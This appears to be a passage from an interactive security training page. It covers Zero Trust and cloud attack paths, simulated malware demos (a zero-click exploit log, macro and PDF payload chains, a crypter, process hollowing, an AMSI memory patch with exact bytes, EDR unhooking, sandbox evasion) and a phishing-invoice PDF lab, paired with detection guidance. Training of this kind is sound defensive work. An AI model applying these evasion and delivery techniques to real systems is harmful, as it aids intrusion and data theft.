Assume breach — microsegmentation, encrypt all internal traffic, continuous monitoring	Lateral movement hits microsegment boundaries. Internal traffic is TLS-encrypted, preventing sniffing. Every hop is logged.	Abuse allowed application pathways (e.g., if the web server is allowed to talk to the DB, compromise the web server and use its legitimate connection). "Living inside the allowed traffic."

🔑 The Session Token Economy

In a Zero Trust world, the most valuable artifact isn't credentials — it's session tokens. Once a user completes MFA and receives a session cookie or token (for Azure AD, the Primary Refresh Token plays this role at the device level), anyone who steals it inherits the authenticated session, bypassing MFA completely. This is why AiTM phishing (Evilginx2, Modlishka), token theft (dumping browser cookies, PRT extraction), and pass-the-cookie attacks are among the dominant initial access techniques in 2024–2026.

Beyond Windows: Cloud, macOS & Linux Security

The attack surface has expanded far beyond Windows endpoints. Modern attackers target the entire infrastructure stack:

Cloud Infrastructure Attacks

SSRF → IMDS: Server-Side Request Forgery hitting the cloud metadata service (169.254.169.254) to steal instance credentials. A single HTTP request can return the instance role's temporary credentials; how far that reaches depends on the permissions attached to the role.

IAM privilege escalation: Misconfigured AWS IAM roles/policies allowing iam:PassRole + lambda:CreateFunction → create Lambda with admin role → full account takeover.

Container escape: Kubernetes pods with privileged: true or mounted Docker socket → escape to host → pivot across cluster.

Supply chain: Compromise CI/CD pipelines (GitHub Actions, Jenkins), inject backdoors into build artifacts that deploy to thousands of targets (SolarWinds model).
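On the defensive side of the SSRF → IMDS item above, a server that fetches user-supplied URLs can refuse targets that resolve to link-local, loopback, or private addresses. This is a minimal sketch; `is_safe_fetch_target` is a hypothetical helper, and the `resolve` parameter exists only so the check can be exercised without real DNS.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_fetch_target(url: str, resolve=socket.getaddrinfo) -> bool:
    """Reject URLs whose host resolves to an internal or metadata address."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = resolve(parsed.hostname, parsed.port or 80)
    except OSError:
        return False  # unresolvable hosts are refused
    for info in infos:
        addr = ipaddress.ip_address(info[4][0])
        # 169.254.169.254 falls under is_link_local
        if addr.is_link_local or addr.is_loopback or addr.is_private:
            return False
    return bool(infos)
```

The fetch itself must connect to the same address that was validated; otherwise a second DNS lookup can return a different answer (DNS rebinding) and the check is bypassed. Redirects need the same validation on every hop.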

macOS & Linux Defenses + Bypasses

macOS Gatekeeper: Blocks unsigned/unnotarized apps. Bypass: Abuse archive handling so the quarantine attribute is never applied (CVE-2022-42821, "Achilles", used restrictive ACLs carried inside an archive to prevent the attribute from being set).

macOS SIP (System Integrity Protection): Kernel-level protection of system files. Bypass: Exploit entitled Apple daemons that have SIP exceptions (e.g., the system_installd Shrootless bug, CVE-2021-30892).

Linux eBPF monitoring: Modern EDRs use eBPF for deep kernel visibility. Bypass: Manipulate eBPF maps, exploit eBPF verifier bugs (CVE-2021-4204), or use kernel-level rootkits to hide from eBPF probes.

Linux SELinux/AppArmor: Mandatory access controls. Bypass: Exploit processes running in unconfined domains, abuse allowed transitions, or find kernel vulns that bypass MAC entirely.

🛡️ The Defender's Advantage in the Modern Era

Despite every bypass technique above, the defender's position has never been stronger. Here's why:

Attack cost has skyrocketed: In 2015, a reliable exploit chain cost ~$50K. In 2026, a full iOS chain is worth $2M+ (Zerodium pricing). Hardware security, HVCI, CET, and hardened browsers have made exploitation dramatically more expensive.

Detection breadth is overwhelming: XDR correlates 5+ data sources. An attacker who evades endpoint ML still gets caught by network anomaly detection, email analysis, identity analytics, or cloud audit logs.

Automation favors defenders: SOAR platforms can isolate hosts, revoke tokens, and block IPs in under 30 seconds. The attacker's window between initial access and containment is shrinking every year.

Hardware can't be patched by malware: HVCI, CET, Secure Boot, and TPM create trust anchors that software-only attacks simply cannot reach. This is a fundamental architectural advantage.

// 11 — Demonstrations ⏱ 4 min · Beginner

Experience It (Safely)

These interactive demos simulate what happens during real attacks — using only safe, simulated data in your browser. No actual exploits, shellcode, or malicious network connections are involved. Each demo recreates the visible and invisible output an analyst would see when examining a real attack, so you can understand both what the user sees (nothing unusual) and what's actually happening behind the scenes.

Demo 1: Document Metadata Extraction

What this simulates: Every Office/PDF document contains metadata — author names, software versions, creation timestamps, printer names, file paths, and revision histories. Attackers use this for reconnaissance: before sending a phishing email, they'll harvest documents from the target organization's website (investor reports, published PDFs, public filings) and extract metadata to learn employee names, internal software versions, directory structures, and network paths. This demo shows you the exact metadata fields that tools like exiftool, FOCA, and metagoofil extract from a typical Office document.

What to look for: The Author field reveals real employee names. The Software field reveals Office version (which tells the attacker which CVEs might work). The Template field can reveal internal server paths. The LastSavedBy field shows who edited the document last — potentially a different employee than the author.
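The same fields can be read from your own documents before publishing them, which is a quick way to audit what a public file would leak. The sketch below assumes an OOXML file (.docx, .xlsx, .pptx), which is a ZIP archive holding metadata in `docProps/core.xml` and `docProps/app.xml`; `read_ooxml_metadata` is a hypothetical helper name, and the returned keys mirror the field labels used in this demo.

```python
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}

def read_ooxml_metadata(path_or_file) -> dict:
    """Return selected metadata fields from an OOXML document (None if absent)."""
    fields = {}
    with zipfile.ZipFile(path_or_file) as z:
        names = set(z.namelist())
        if "docProps/core.xml" in names:
            core = ET.fromstring(z.read("docProps/core.xml"))
            fields["Author"] = core.findtext("dc:creator", namespaces=NS)
            fields["LastSavedBy"] = core.findtext("cp:lastModifiedBy", namespaces=NS)
        if "docProps/app.xml" in names:
            app = ET.fromstring(z.read("docProps/app.xml"))
            fields["Software"] = app.findtext("ep:Application", namespaces=NS)
            fields["AppVersion"] = app.findtext("ep:AppVersion", namespaces=NS)
            fields["Template"] = app.findtext("ep:Template", namespaces=NS)
    return fields
```

Running this over a folder of outbound documents and reviewing any non-empty Author, LastSavedBy, or Template values shows what should be stripped (for example with Office's Document Inspector) before release.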

Demo 2: Simulated Zero-Click Notification

What this simulates: A zero-click exploit targeting a messaging app. In real attacks (like FORCEDENTRY or the WhatsApp VOIP bug), the victim receives a message or call that triggers automatic parsing of malicious data — no taps, clicks, or interaction required. This demo recreates the kill chain: (1) incoming message notification appears, (2) the messaging app's parser processes the attachment automatically, (3) the parser triggers a buffer overflow in the image/media decoder, (4) the overflow redirects execution to shellcode, (5) the shellcode installs a persistent implant. Everything happens in under 2 seconds — the victim's only visible indicator is a brief notification that may disappear.

What to look for: Watch the timing — the exploit completes before a human could possibly react. Notice how the "legitimate" app functionality (receiving a message) is the attack vector. In real forensics, the only artifact might be a log entry showing the message was received and deleted, or an anomalous crash report from the parser component.

[SIMULATED] Zero-Click iMessage Exploit Chain (FORCEDENTRY-style)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
>> Incoming iMessage from unknown sender: +1-555-0199
[00.000s] iMessage received — attachment: IMG_0847.gif (47 KB)
[00.001s] BlastDoor sandbox: parsing attachment in isolated process
[00.003s] ImageIO framework: detecting format... JBIG2 inside PDF
[00.005s] JBIG2 decoder: loading segment table... 70,247 segments
[00.008s] Segment 1-1000: bitmap operations (AND, OR, XOR)
[00.045s] Segment 1001-5000: building register file in memory
[00.112s] Segment 5001-20000: constructing ALU operations
[00.340s] Segment 20001-70247: executing virtual machine program

>> ██ JBIG2 VM EXPLOITATION ██
[00.341s] VM computed: heap buffer overflow address
[00.342s] Heap overflow triggered in CoreGraphics
[00.343s] Control flow hijacked — PC redirected

>> STAGE 2: Sandbox Escape
[00.345s] Exploiting second vulnerability to escape BlastDoor
[00.347s] Gained access to imagent process (PID 1847)
[00.349s] Privilege escalation via kernel vulnerability...
[00.355s] Root access achieved

>> STAGE 3: Implant Installation
[00.360s] Disabling crash reporter (CrashMover)
[00.365s] Writing implant to /private/var/tmp/.com.apple.sbd
[00.370s] Registering LaunchDaemon for persistence
[00.380s] Connecting to C2: 185.xxx.xxx.xxx:443 (TLS 1.3)
[00.520s] Beacon established — full device access

>> STAGE 4: Data Exfiltration
[00.600s] Accessing: Messages.app database (SMS + iMessage)
[00.700s] Accessing: Contacts (4,847 entries)
[00.800s] Enabling: Microphone (background recording)
[00.900s] Enabling: Camera (periodic screenshots)
[01.000s] Accessing: GPS location (continuous tracking)
[01.100s] Accessing: Keychain (stored passwords + tokens)
[01.200s] Accessing: Safari history + saved passwords
[01.300s] Accessing: WhatsApp / Signal / Telegram databases

>> ████████ DEVICE FULLY COMPROMISED ████████
>> What the victim saw: Absolutely nothing.
>> What the victim heard: Nothing.
>> Total elapsed time: 1.3 seconds
>> User interaction: ZERO (no tap, no click, no notification)
>> iMessage thread: Auto-deleted by implant

⚠ THIS IS A SIMULATION — no real exploit was executed.

Demo 3: Macro Execution Simulation

What this simulates: What happens inside the Office process when a user clicks "Enable Content" on a macro-laden document. In the real attack: (1) Office loads the VBA project from the document's vbaProject.bin OLE stream, (2) it compiles the VBA code to p-code, (3) it automatically executes an auto-run macro, such as AutoOpen() or Document_Open() in Word or Auto_Open() or Workbook_Open() in Excel, (4) the macro uses Shell() or WScript.Shell to launch PowerShell, (5) PowerShell downloads and executes a second-stage payload from the attacker's C2 server. This demo shows each stage with the actual process tree and command lines that a forensic analyst would see in Sysmon logs.

What to look for: The process chain: WINWORD.EXE → cmd.exe → powershell.exe → beacon.exe. In real attacks, the PowerShell command is often base64-encoded (-enc flag) and uses Invoke-Expression (IEX) with Net.WebClient.DownloadString() to pull the next stage entirely in memory — never touching disk.
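When an analyst finds a -enc argument in a Sysmon command line, the first step is to decode it. The sketch below assumes the standard PowerShell convention (Base64 over UTF-16LE text); the helper name decode_encoded_command and the sample script are illustrative only, and the sample is a harmless Write-Output call built inside the example.

```python
import base64

def decode_encoded_command(b64_text: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 over UTF-16LE text)."""
    raw = base64.b64decode(b64_text)
    return raw.decode("utf-16-le")

# Build a harmless sample the same way PowerShell expects it, then decode it.
sample_script = "Write-Output 'hello'"
encoded = base64.b64encode(sample_script.encode("utf-16-le")).decode("ascii")

decoded = decode_encoded_command(encoded)
print(encoded)
print(decoded)
```

Decoding with plain UTF-8 instead of UTF-16LE leaves a NUL byte between every ASCII character, which is a quick way to recognize this encoding in raw logs.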

Demo 4: PDF Exploit Dissection

What this simulates: The complete lifecycle of a malicious PDF being opened in Adobe Reader. This is the same attack detailed in Section 05 (Exploit Crafting Pipeline), but shown from the runtime perspective — what actually happens second by second inside the Reader process. The demo traces: (1) PDF header parsing and object loading, (2) Catalog traversal finding the /OpenAction reference, (3) JavaScript Action object loading and stream decompression, (4) SpiderMonkey JS engine executing the heap spray loop (allocating ~200MB of NOP sled + shellcode), (5) the vulnerable API call (Collab.collectEmailInfo) triggering the buffer overflow, (6) EIP hijack to 0x0C0C0C0C, (7) CPU sliding through the NOP sled, (8) shellcode execution — PEB walk → API resolution → download → backdoor execution.

What to look for: The heap spray creates a distinctive memory pattern — hundreds of identical 1MB blocks at predictable addresses. EDR tools detect this by monitoring VirtualAlloc call frequency. The vulnerability trigger (Collab.collectEmailInfo) is a known dangerous function that PDF security scanners flag. The child process spawn (AcroRd32.exe → cmd.exe) is the most reliable detection point.

FUD & Evasion Demonstrations

The following demos simulate the evasion techniques covered in Chapter 08 — FUD. Each one recreates exactly what an analyst would see in process monitors, debuggers, and EDR telemetry when these techniques are used in real malware.

Demo 5: Crypter / Packer in Action

What this simulates: A raw RAT payload (AsyncRAT.exe) being processed through a crypter. The demo shows the exact sequence: (1) the original executable is scanned and flagged by 47/72 AV engines, (2) the crypter reads the PE file and encrypts each section with AES-256, (3) a new stub executable is generated that contains the encrypted payload as a resource, (4) at runtime the stub decrypts the payload in memory and passes control to the original entry point, never writing the decrypted payload to disk. The final stub is scanned again: 0/72 detections. This is the general approach used by tools such as Veil and Hyperion and by commercial crypters.

What to look for: Notice the entropy change. The original PE has distinct .text, .data, and .rdata sections with varying entropy. After crypting, the payload blob shows near-uniform entropy of about 7.98 bits per byte, close to the 8.0 maximum of random data. EDR tools flag this because ordinary code and data sections rarely exceed about 7.0 bits per byte, although compressed resources and commercially packed installers can. Also watch the stub's import table: it only imports VirtualAlloc, RtlMoveMemory, and a few crypto APIs, a suspiciously minimal import table compared to normal software.
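The entropy figure quoted here is Shannon entropy measured in bits per byte. A minimal sketch of the calculation follows; the three sample buffers are made up for illustration, with os.urandom standing in for an encrypted payload blob.

```python
import math
import os
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Return Shannon entropy in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

low = shannon_entropy(b"A" * 4096)                 # one repeated byte value
uniform = shannon_entropy(bytes(range(256)) * 16)  # every byte value equally often
random_like = shannon_entropy(os.urandom(65536))   # stands in for an encrypted blob

print(f"repeated byte: {low:.2f}")
print(f"uniform bytes: {uniform:.2f}")
print(f"random data:   {random_like:.2f}")
```

Running the same function over each PE section separately, rather than over the whole file, is what exposes a single encrypted blob sitting next to normal-looking code.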

Demo 6: Process Hollowing (RunPE) Step-by-Step

What this simulates: The complete RunPE process hollowing technique. A malicious loader spawns a legitimate Windows process (svchost.exe) in a SUSPENDED state, hollows out its memory, writes a malicious payload into the hollowed process, fixes up the thread context to point to the new entry point, and resumes execution. The result: the malicious code runs under the identity of a trusted Windows process. This is the #1 technique used by crypter stubs to execute decrypted payloads in memory.

What to look for: Watch the API call sequence, which is the exact pattern EDR tools write signatures for: CreateProcess(SUSPENDED) → NtUnmapViewOfSection → VirtualAllocEx → WriteProcessMemory → SetThreadContext → ResumeThread. Any process that calls this exact chain is almost certainly performing process hollowing. Also notice the parent-child mismatch: svchost.exe is normally spawned by services.exe, not by a random executable, and EDR flags this anomaly.
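On the detection side, matching this chain is an ordered-subsequence check over a process's API trace. The sketch below is a simplified illustration, not how any particular EDR product implements it; the trace lists are invented sample data, and real telemetry would carry arguments and thread IDs as well.

```python
HOLLOWING_CHAIN = [
    "CreateProcess(SUSPENDED)",
    "NtUnmapViewOfSection",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "SetThreadContext",
    "ResumeThread",
]

def contains_in_order(trace, pattern):
    """True if every item of pattern appears in trace in the same order (gaps allowed)."""
    remaining = iter(trace)
    # "wanted in remaining" consumes the iterator up to the match,
    # so each later item must appear after the previous one.
    return all(wanted in remaining for wanted in pattern)

# Hypothetical traces: unrelated calls may be interleaved with the chain.
suspicious_trace = [
    "CreateProcess(SUSPENDED)", "NtQueryInformationProcess",
    "NtUnmapViewOfSection", "VirtualAllocEx",
    "WriteProcessMemory", "WriteProcessMemory",
    "SetThreadContext", "ResumeThread",
]
benign_trace = ["CreateProcess(SUSPENDED)", "ResumeThread"]

print(contains_in_order(suspicious_trace, HOLLOWING_CHAIN))
print(contains_in_order(benign_trace, HOLLOWING_CHAIN))
```

Allowing gaps matters because loaders commonly interleave other calls, such as repeated WriteProcessMemory calls for each PE section.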

Demo 7: AMSI Bypass + PowerShell Payload

What this simulates: An attacker bypassing the Anti-Malware Scan Interface (AMSI) in PowerShell before executing a malicious script. AMSI is Microsoft's scanning hook — every PowerShell command, VBScript, and JScript is sent to the installed AV engine before execution. Attackers bypass it by patching the AmsiScanBuffer function in memory to always return "clean." This demo shows: (1) a malicious PowerShell command being blocked by AMSI, (2) the memory patch being applied (overwriting the first bytes of AmsiScanBuffer with a RET instruction), (3) the same command now executing successfully because AMSI no longer scans it.

What to look for: The bypass is a single memory write of 6 bytes (0xB8 0x57 0x00 0x07 0x80 0xC3 = mov eax, 0x80070057; ret) at the start of amsi.dll!AmsiScanBuffer. The patched function returns the error code E_INVALIDARG (0x80070057) without scanning anything, and callers such as PowerShell treat the failed scan as "nothing detected" and let the content run. Defenders detect this by monitoring VirtualProtect calls targeting amsi.dll memory regions, or by using ETW events that fire before AMSI even processes the scan.
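The byte sequence quoted above is six bytes long, and its middle four bytes are a little-endian immediate, the same byte order covered in the Hacker's Math section. The sketch below decodes it the way a memory-integrity check might when comparing a function prologue against this known patch; describe_patch is a hypothetical helper name, and a real check would compare against the on-disk bytes of amsi.dll rather than a single hard-coded pattern.

```python
import struct

# The patch bytes quoted in the text: mov eax, imm32 ; ret
PATCH = bytes([0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3])

def describe_patch(code: bytes):
    """Return the imm32 of a 'mov eax, imm32; ret' prologue, or None if it does not match."""
    if len(code) < 6 or code[0] != 0xB8 or code[5] != 0xC3:
        return None
    (imm32,) = struct.unpack("<I", code[1:5])  # little-endian 32-bit immediate
    return imm32

imm = describe_patch(PATCH)
print(len(PATCH), hex(imm))
```

The decoded value 0x80070057 is the Windows HRESULT E_INVALIDARG, which is why the patched function reports a failed scan rather than a detection.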

Demo 8: EDR Unhooking via Direct Syscalls

What this simulates: How malware evades EDR (Endpoint Detection & Response) by bypassing userland hooks. Modern EDR products (CrowdStrike, SentinelOne, Defender for Endpoint) inject a DLL into every process that hooks critical ntdll.dll functions — when malware calls NtAllocateVirtualMemory or NtWriteVirtualMemory, the hook redirects execution to the EDR's monitoring code first. This demo shows two bypass methods: (1) Fresh DLL mapping — reading a clean copy of ntdll.dll from disk and overwriting the hooked copy in memory, and (2) Direct syscalls — calling the kernel directly via the syscall instruction, completely skipping ntdll.dll and all its hooks.

What to look for: In Method 1, watch the EDR hooks disappear: the function prologue changes from jmp EDR_Hook back to the original mov r10, rcx; mov eax, SSN. In Method 2, notice the syscall is made directly from the malware's own code, so there's no call into ntdll.dll at all. Defenders counter this with kernel callbacks (which can't be unhooked from userland) and by monitoring for processes that read ntdll.dll from disk with CreateFile, which ordinary applications rarely do.
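The prologue difference described here can be checked byte by byte. The sketch below classifies the first bytes of an x64 ntdll stub as clean or hooked; it assumes the hook is an E9 (jmp rel32) at offset 0, which is only one of several hooking styles, and both sample byte strings, including the syscall number 0x18, are invented for illustration.

```python
import struct

CLEAN_PROLOGUE = bytes([0x4C, 0x8B, 0xD1, 0xB8])  # mov r10, rcx ; mov eax, imm32
JMP_REL32 = 0xE9                                  # opcode of a relative jump

def classify_stub(first_bytes: bytes):
    """Return (state, ssn) for the first bytes of an ntdll syscall stub."""
    if len(first_bytes) >= 8 and first_bytes[:4] == CLEAN_PROLOGUE:
        (ssn,) = struct.unpack("<I", first_bytes[4:8])  # syscall number follows B8
        return "clean", ssn
    if first_bytes[:1] == bytes([JMP_REL32]):
        return "hooked", None
    return "unknown", None

# Hypothetical samples: an unmodified stub and one overwritten with a jump.
clean_sample = bytes([0x4C, 0x8B, 0xD1, 0xB8, 0x18, 0x00, 0x00, 0x00])
hooked_sample = bytes([0xE9, 0x10, 0x20, 0x30, 0x40, 0x00, 0x00, 0x00])

print(classify_stub(clean_sample))
print(classify_stub(hooked_sample))
```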

Demo 9: Anti-Sandbox Evasion Checks

What this simulates: A malware sample performing environment checks before executing its payload. Sophisticated malware won't detonate in analysis environments. It checks for signs of sandboxes (low CPU cores, small RAM, short uptime), virtual machines (VMware/VirtualBox artifacts, hypervisor CPUID bit), and debuggers (timing checks, PEB flags, hardware breakpoints). If any check suggests an analysis environment, the malware exits cleanly or runs benign code instead, appearing "clean" to automated analysis systems. This demo runs through real checks that malware like Emotet, TrickBot, and Cobalt Strike beacons perform.

What to look for: Notice the layered approach: the malware doesn't rely on a single check. It performs 12+ checks across CPU, memory, processes, registry, timing, and user behavior. Each check alone might have false positives, but the combination creates a reliable sandbox fingerprint. Pay attention to the mouse movement check, since many sandboxes have static cursors. The "delayed execution" trick (sleeping 5+ minutes) is designed to outlast automated sandbox runs, which typically analyze a sample for only 60-120 seconds.

✅ These demos are 100% safe

No actual exploits or malicious code is used. All demonstrations are visual simulations running entirely in your browser using JavaScript setTimeout() calls and DOM manipulation. No network requests are made. No files are created. No system APIs are called. The "hex bytes" and "memory addresses" shown are pre-written strings, not actual memory contents. You can verify this by viewing the page source.

// 14 — PDF Lab ⏱ 10 min · Intermediate

Social Engineering PDF Lab

Social engineering is the #1 initial access vector. Attackers don't just send malware — they send convincing documents. An invoice PDF from a "vendor" is far more likely to be clicked than a random attachment. In this lab, you'll generate a real professional invoice PDF and study what separates it from a weaponized one.

🎓 Lab Objective — Generate a professional-looking invoice PDF with an embedded download link (pointing to a legitimate app like PuTTY). Then study: (1) what makes this PDF benign, (2) what structural changes would make it malicious, and (3) what security tools look for when analyzing PDFs. Test it against your AV/sandbox to see what does and doesn't trigger.

Invoice PDF Generator

Fill in the invoice details below. The generated PDF will contain a visible download link — just like a real phishing document would. The link points to whatever URL you specify (e.g., the official PuTTY download). Everything runs client-side.

Sender Company Name

Invoice Number

Recipient Name

Recipient Company

Invoice Amount ($)

Service Description

⬇ Download Link Configuration — This is the social engineering element. The PDF will contain a professional-looking button/link that encourages the recipient to download software. In a real attack, this URL would point to malware. For this lab, we use a legitimate application.

Download URL (Link Target)

Button Text on PDF

🧪 Lab Exercise — After generating the PDF: (1) Open it in your PDF reader and click the link. Does your browser warn you? (2) Upload it to an online sandbox (e.g., any.run, hybrid-analysis.com) — what does it flag? (3) Send it to yourself via email — does your email gateway quarantine it? (4) Check the PDF with pdfid or pdf-parser — what objects do you see?

Benign vs. Weaponized — What Changes?

Your generated invoice is completely benign. Here's exactly what separates it from a real weaponized phishing PDF — and why understanding the difference matters for threat hunting.

✅ YOUR PDF (Benign)

LINK Contains a standard /URI annotation — a normal clickable hyperlink. The user sees it, clicks it voluntarily, browser navigates.

NO JS Zero JavaScript. No /JavaScript or /JS entries in the PDF object tree.

NO AUTO No /OpenAction or /AA (Additional Actions). Nothing executes when the PDF is opened.

NO EMBED No embedded files (/EmbeddedFile), no file attachments, no embedded executables.

VISIBLE The link URL is visible to the user. Nothing is hidden or obscured.

STATIC Pure static content — text, rectangles, colors. No forms, no AcroForms, no XFA.

❌ WEAPONIZED PDF (Explained)

/Launch Uses /Launch action to execute a command when clicked — can run cmd.exe, PowerShell, or an embedded EXE directly.

/JavaScript Embedded JavaScript that triggers on open. Can exploit reader vulnerabilities (CVE-2009-0927, CVE-2013-2729).

/OpenAction Auto-executes when the PDF is opened, with no further click required. Combined with /JS, exploitation needs nothing from the user beyond opening the file.

/EmbeddedFile Contains an embedded executable inside the PDF stream, extracted and launched by JavaScript or /Launch action.

OBFUSCATED Streams compressed with FlateDecode, ASCIIHexDecode, or custom filters. Object references chained to evade static analysis.

EXPLOIT Malformed objects targeting parser vulnerabilities — heap sprays, integer overflows, use-after-free in the rendering engine.

PDF Object Tree — What Analysts See

When you run pdfid on your generated invoice, here's what it reports vs. what a malicious PDF would show:

pdfid your-invoice.pdf

/Page          1
/URI           1
/Action        1
/JavaScript    0    ← clean
/JS            0    ← clean
/OpenAction    0    ← clean
/Launch        0    ← clean
/EmbeddedFile  0    ← clean
/AcroForm      0    ← clean
/XFA           0    ← clean
/Encrypt       0
/ObjStm        0

pdfid malicious-invoice.pdf

/Page          1
/URI           0
/Action        3    ← suspicious
/JavaScript    2    ← 🚩 ALERT
/JS            2    ← 🚩 ALERT
/OpenAction    1    ← 🚩 auto-exec
/Launch        1    ← 🚩 cmd exec
/EmbeddedFile  1    ← 🚩 payload
/AcroForm      1    ← 🚩 forms
/XFA           0
/Encrypt       1    ← hides content
/ObjStm        3    ← compressed objs
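The triage idea behind these two listings is keyword counting over the raw file bytes. The sketch below is a deliberately simplified stand-in for that idea and is not the pdfid implementation: it ignores hex-escaped names (such as /J#53) and anything hidden inside compressed object streams, both of which the real tool accounts for. The two byte strings are hand-written fragments, not complete PDFs.

```python
import re

KEYWORDS = ["/Page", "/URI", "/JavaScript", "/JS", "/OpenAction", "/AA",
            "/Launch", "/EmbeddedFile", "/AcroForm", "/XFA", "/Encrypt", "/ObjStm"]
HIGH_RISK = ["/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile"]

def count_keywords(pdf_bytes: bytes) -> dict:
    """Count occurrences of each PDF name, rejecting longer names such as /Pages."""
    counts = {}
    for kw in KEYWORDS:
        pattern = re.escape(kw.encode("ascii")) + rb"(?![A-Za-z0-9_])"
        counts[kw] = len(re.findall(pattern, pdf_bytes))
    return counts

def risk_flags(counts: dict) -> list:
    """Return the high-risk keywords that appear at least once."""
    return [kw for kw in HIGH_RISK if counts[kw] > 0]

# Hand-written fragments for illustration only.
benign = b"<< /Type /Pages /Kids [1 0 R] >> << /Type /Page /URI (https://example.com/) >>"
suspect = (b"<< /Type /Page /OpenAction 5 0 R >> "
           b"<< /S /JavaScript /JS (app.alert(1)) >> << /S /Launch >>")

benign_counts = count_keywords(benign)
suspect_counts = count_keywords(suspect)
print(risk_flags(benign_counts))
print(risk_flags(suspect_counts))
```

To try it on your generated invoice, read the file in binary mode and pass the bytes to count_keywords, then compare the result with what pdfid reports.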

🚩 Phishing PDF Red Flags — What to Hunt For

Use this checklist when analyzing suspicious PDFs during incident response or threat hunting. Each flag is mapped to the MITRE ATT&CK framework.

Urgency Language

"OVERDUE", "FINAL NOTICE", "Act within 24 hours" — social pressure to bypass critical thinking.

T1566.001 — Spearphishing Attachment

Mismatched Sender

Invoice from "CloudSync Technologies" but email is from billing@cl0udsync-tech.com — typosquatting domain.

T1583.001 — Acquire Infrastructure: Domains

Download Prompts Inside PDFs

"Download the secure client" — legitimate invoices never ask you to install software. This is the #1 social engineering trigger.

T1204.002 — User Execution: Malicious File

/JavaScript or /JS Present

PDFs containing JavaScript deserve immediate scrutiny in a corporate context. Interactive forms do use JavaScript legitimately, but an invoice has no need for it.

T1059.007 — Command and Scripting Interpreter: JavaScript

/OpenAction or /AA Present

Auto-execute on open means no click inside the document is needed. The PDF does something the instant it's rendered, before the user interacts with its content.

T1203 — Exploitation for Client Execution

/Launch Action

Can directly invoke system commands. A PDF calling cmd.exe or powershell.exe is a definitive IOC.

T1059 — Command and Scripting Interpreter

Embedded Files

/EmbeddedFile streams containing executables, scripts, or Office documents with macros — payload delivery inside the PDF.

T1027.009 — Obfuscated Files or Information: Embedded Payloads

Heavy Stream Encoding

Multiple filter chains (FlateDecode + ASCIIHexDecode + ASCII85Decode) stacked to hide content from static scanners.

T1027 — Obfuscated Files or Information

URL Shorteners / Redirects

Links going through bit.ly, tinyurl, or multi-hop redirects to obscure the final destination. Legitimate invoices use direct corporate URLs.

T1608.005 — Stage Capabilities: Link Target

Unexpected Attachment

Did the recipient expect this invoice? Unsolicited financial documents are the most common phishing vector in enterprise environments.

T1566.001 — Spearphishing Attachment

🛡 How Security Tools Detect Malicious PDFs

Understanding detection helps you appreciate both sides — what attackers try to evade and what defenders rely on. Here's how each layer of the security stack handles PDF threats.

📧 Email Gateway (Layer 1)

Static Analysis: Scans PDF structure for /JavaScript, /Launch, /OpenAction, /EmbeddedFile keywords. Your lab PDF passes this — it only has /URI.

URL Reputation: Extracts all URLs and checks against threat intel feeds. A link to putty.org is clean; a link to putty-secure[.]download would be flagged.

Sandbox Detonation: Opens the PDF in a headless VM, watches for process spawning, network callbacks, file drops. Your PDF just renders text — nothing detonates.
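The URL reputation step can be approximated in a few lines: pull every /URI target out of the file and compare its hostname against a list you trust. This is a minimal sketch under stated assumptions. The allowlist, the sample bytes, and the helper names are hypothetical, and the regular expression only handles plain literal strings, so it misses escaped parentheses, hex strings, and links inside compressed object streams.

```python
import re
from urllib.parse import urlparse

# Matches "/URI (...)" literal strings only; a simplification of real PDF syntax.
URI_PATTERN = re.compile(rb"/URI\s*\(([^)]*)\)")

ALLOWLIST = {"www.example.com"}  # hypothetical set of trusted hosts

def extract_hosts(pdf_bytes: bytes) -> list:
    """Return the lowercase hostname of every /URI target found in the bytes."""
    hosts = []
    for match in URI_PATTERN.finditer(pdf_bytes):
        url = match.group(1).decode("latin-1")
        host = urlparse(url).hostname
        if host:
            hosts.append(host.lower())
    return hosts

def unknown_hosts(pdf_bytes: bytes, allowlist=ALLOWLIST) -> list:
    """Return hosts that are not on the allowlist and need a reputation lookup."""
    return [h for h in extract_hosts(pdf_bytes) if h not in allowlist]

# Hand-written fragment for illustration, not a complete PDF.
sample = (b"<< /S /URI /URI (https://www.example.com/download) >> "
          b"<< /S /URI /URI (https://example.invalid/setup.exe) >>")

hosts = extract_hosts(sample)
to_review = unknown_hosts(sample)
print(hosts)
print(to_review)
```

A real gateway would replace the static allowlist with a threat intelligence lookup, but the extraction step is the same.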

🖥 EDR / Endpoint (Layer 2)

Process Chain: Monitors if PDF reader spawns child processes (cmd.exe, powershell.exe, mshta.exe). Your PDF opens a browser — normal behavior for URI clicks.

Behavioral Rules: YARA rules flag PDFs calling WinExec, ShellExecute, or containing ROP gadgets. Your PDF has none of these.

Memory Scanning: Detects heap sprays (NOP sleds in streams), shellcode patterns, and exploit signatures at runtime.
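The process chain rule is the simplest of these endpoint checks to express. The sketch below flags document applications that spawn a command interpreter; the process name sets and the (parent, child) event tuples are assumptions made for illustration, since real EDR telemetry also carries command lines, hashes, and user context.

```python
# Assumed name sets for illustration; a real rule set would be much longer.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "acrord32.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "mshta.exe"}

def flag_process_events(events):
    """Return (parent, child) pairs where a document app spawned an interpreter."""
    alerts = []
    for parent, child in events:
        if parent.lower() in DOCUMENT_APPS and child.lower() in SUSPICIOUS_CHILDREN:
            alerts.append((parent, child))
    return alerts

# Hypothetical process creation events as (parent image, child image).
events = [
    ("explorer.exe", "AcroRd32.exe"),
    ("AcroRd32.exe", "cmd.exe"),
    ("AcroRd32.exe", "chrome.exe"),
    ("WINWORD.EXE", "powershell.exe"),
]

alerts = flag_process_events(events)
print(alerts)
```

The browser launch from the PDF reader is not flagged, which matches the lab PDF's behavior when its link is clicked.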

